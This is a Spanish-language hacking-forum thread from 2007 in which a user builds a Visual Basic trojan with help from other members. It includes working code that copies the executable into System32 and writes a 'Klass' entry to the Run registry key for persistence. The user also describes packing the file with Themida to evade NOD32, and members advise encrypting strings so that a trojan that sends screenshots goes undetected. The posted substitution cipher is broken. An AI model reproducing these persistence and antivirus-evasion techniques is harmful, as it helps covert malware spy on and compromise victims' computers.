copiar a system o system 32

Iniciado por vivachapas, 1 Mayo 2007, 20:15 PM

0 Miembros y 1 Visitante están viendo este tema.

Hendrix

Para lo de encriptacion de cadenas te dejo algo:

http://www.google.es/search?hl=es&client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hs=rQf&q=cifrar+cadenas+VB&btnG=B%C3%BAsqueda&meta=

http://foro.elhacker.net/index.php?topic=156434.0;prev_next=next

Citarsi yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

Benru te a dado todo el codigo que necesitas.... :) :) Te lo recopilo un poquito:

En un modulo:

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long


En el formulario:

Dim system32 As String
Dim windows As String

Public Function RutaSystem32()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
   
Longitud = 128
   
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
system32 = Camino
End Function

Public Function RutaWindows()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
   
Longitud = 128
   
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
windows = Camino
End Function

Private Sub Form_Load()

RutaSystem32

MsgBox system32
End Sub


Un Saludo.

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

BenRu

Citarsi yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

No, no es necesaria. Pero recuerda que tendras que modificar el codigo, quedaria asi:

Private Sub Form_Load()

    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim sys
   
    Longitud = 128
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
End Sub


Saludos

vivachapas

#12
ok miren... lo de copiar a System32 tengo esto:

y funciana ;)

Modulo1
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Function System32() As String
    Dim buf As String
    Dim ret As Long
    buf = String$(260, Chr$(0))
    ret = GetSystemDirectory(buf, Len(buf))
    System32 = Left$(buf, ret)
End Function


Form
Private Sub Form_Load()
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub


hasta ahi anda barbaro... no salta el antivirus ni nada... ahora en el form le agregue para q se ejecute y quedo asi:

form
Dim clave As Object

Private Sub Form_Load()
On Error GoTo Error
Set clave = CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\prueba.exe"
Error:
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub


y si... es como dice Hendrix. me lo detecta el AV.. ahora leo esos manuales... y despues dejo el code final aqui por si alguien lo necesita ;)


para ser sincero no entendi lo de cifrar... es como sustituir la direccion por una variable???

vivachapas

lo logreeeee bueno...

bueno les cuento lo puse como esta en el codigo anterior... y le pase el themida... y por lo menos el NOD32 no lo detecta...
pasa q me quedo re pesado ahora...

si me pudieran explicar bien como cifrar las cadenas xq no lo termine de enteder se los agradeceria muchisimo...


IGUALMENTE MUCHAS GRACIAS A TODOS!

toy feliz de este logro ;)

Novlucker

Le pasaste el AV sin comprimir con Themida?? O ya te lo detectaba??

El Themida incrementa mucho el tamaño de un archivo, intenta conseguir un troyano indetectable sin necesidad de recurrir a esto ultimo

salu2
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

vivachapas

#15
cuando compilaba el exe saltaba el AV :(

ahora q le pase el themida no lo detecta... pero es mas lento... por ejemplo para mandar los screenshot tarda un monton y eso q tienen resolucion baja (20)

vivachapas

ninguno me puede explicar bien como cifro las cadenas??

porfa... tengo el server q pesa muchisimo y mucho mas lento

Hendrix

Ya te lo dije, tienes que buscar alguna funcion que encripte una cadena de texto, luego buscas la que lo desencripte, abres un proyecto nuevo en VB, pones la funcion encriptadora y ahces que aparezca el resutlado del texto encritpado en el textbox, lo copias y lo pones en la funcion que quieres ejecutar, pasandole la funcion desencriptadora....algo asi:

Kill "C:\archivo.exe"

Encritpas esto: C:\Archivo.exe

te queda asi: hgd5b5td4b

luego, pones esto:

kill funciondesencriptadora("hgd5b5td4b")

lo que hace esto es pasarle al comando kill, el argumento ya desencritpado, es decir, C:\archivo.exe

Un Saludo.

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

vivachapas

ahora entendi!! disculpen mi ignoracia!! XD

entonces lo q yo tengo q cifrar sera esto:

Clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\klass.exe"


y me quedaria algo asi:

Clave.regwrite funciondesencriptadora("djflsdflkasdf")

vivachapas

huyyy... q hago mal!!... por favor les pido q miren este codigo q hice:


poner un text1   y en el text1.text = "####$$&&***%/***"
lo q es igual a "agus" una vez desencripado
Dim Des As String

Function descifrar(Ruta As String)
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
End Function

Private Sub Command1_Click()
Des = descifrar(Text1.Text)
Text1.Text = Des
End Sub


ahora si prueban el codigo cuando le hacen click al boton... el text1 se borra y no deja ningun resultado... q hago mal?